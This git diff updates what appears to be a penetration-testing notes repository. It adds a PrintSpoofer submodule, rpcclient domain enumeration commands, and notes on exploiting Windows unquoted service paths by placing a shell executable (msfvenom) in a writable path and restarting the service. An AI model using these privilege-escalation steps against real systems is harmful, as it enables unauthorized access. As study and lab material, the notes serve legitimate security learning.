diff --git a/.gitmodules b/.gitmodules index 5ca311d..06838ac 100644 --- a/.gitmodules +++ b/.gitmodules @@ -136,3 +136,6 @@ [submodule "stego/stego-toolkit"] path = stego/stego-toolkit url = https://github.com/DominicBreuker/stego-toolkit.git +[submodule "exploit/windows/printspoofer"] + path = exploit/windows/printspoofer + url = https://github.com/dievus/printspoofer.git diff --git a/enumeration/windows/bloodhound.md b/enumeration/windows/bloodhound.md new file mode 100644 index 0000000..3d92bb8 --- /dev/null +++ b/enumeration/windows/bloodhound.md @@ -0,0 +1,3 @@ +# Bloodhound + +* DNS diff --git a/enumeration/windows/rpcclient.md b/enumeration/windows/rpcclient.md new file mode 100644 index 0000000..315e8a2 --- /dev/null +++ b/enumeration/windows/rpcclient.md @@ -0,0 +1,10 @@ +# RPCclient + +* Enumerate users and groups + +```sh +rpcclient +rpcclient $> enumdomusers +... +rpcclient $> enumdomgroups +``` diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md index 0e89282..5ddd0f5 100644 --- a/exploit/windows/docs/unquoted_path.md +++ b/exploit/windows/docs/unquoted_path.md @@ -14,3 +14,27 @@ copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe" net start ``` +## Intel about Service + +* Access should contain writeable +```sh +Get-Acl -Path | Format-List +``` + +* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1` + +* Check `ServiceRights` via +```sh +"" | Get-ServiceAcl | select ExpandProperty Access +``` + +## Interacting with the Service + +* Upload msfvenom shell to the writeable path, setup listener and +```sh +sc start "servicename" +Stop-Service -name "servicename" +Start-Service -name "servicename" +``` + + diff --git a/exploit/windows/printspoofer b/exploit/windows/printspoofer new file mode 160000 index 0000000..29a9e27 --- /dev/null +++ b/exploit/windows/printspoofer @@ -0,0 +1 @@ +Subproject commit 29a9e27f5418317bd5f4560ccfebcb65ca181b32